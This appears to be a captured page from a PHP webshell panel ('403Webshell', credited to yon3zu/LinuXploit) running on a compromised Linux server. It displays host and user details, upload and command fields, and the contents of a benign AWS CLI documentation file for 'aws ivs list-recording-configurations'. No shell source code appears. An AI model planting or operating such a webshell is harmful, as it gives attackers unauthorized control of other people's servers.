403Webshell
Server IP : 167.99.254.82  /  Your IP : 216.73.216.188
Web Server : Apache
System : Linux host.techisquad.com 5.15.0-190-generic #200-Ubuntu SMP Fri Aug 7 15:06:04 UTC 2026 x86_64
User : pawluxera ( 1011)
PHP Version : 8.1.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /lib/python3/dist-packages/awscli/examples/ivs/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /lib/python3/dist-packages/awscli/examples/ivs/list-recording-configurations.rst
**To list all the RecordingConfiguration resources created in this account**

The following ``get-recording-configuration`` example gets information about the RecordingConfiguration resource for the specified ARN. ::

    aws ivs list-recording-configurations

Output::

    {
        "recordingConfigurations": [
            {
                "arn": "arn:aws:ivs:us-west-2:123456789012:recording-configuration/ABcdef34ghIJ",
                "name": "test-recording-config-1",
                "destinationConfiguration": {
                    "s3": {
                        "bucketName": "demo-recording-bucket-1"
                    }
                },
                "state": "ACTIVE",
                "tags": {}
            },
            {
                "arn": "arn:aws:ivs:us-west-2:123456789012:recording-configuration/CD12abcdGHIJ",
                "name": "test-recording-config-2",
                "destinationConfiguration": {
                    "s3": {
                        "bucketName": "demo-recording-bucket-2"
                    }
                },
                "state": "ACTIVE",
                "tags": {}
            }
        ]
    }

For more information, see `Record to Amazon S3 <https://docs.aws.amazon.com/ivs/latest/userguide/record-to-S3.html>`__ in the *Amazon Interactive Video Service User Guide*.

Youez - 2016 - github.com/yon3zu
LinuXploit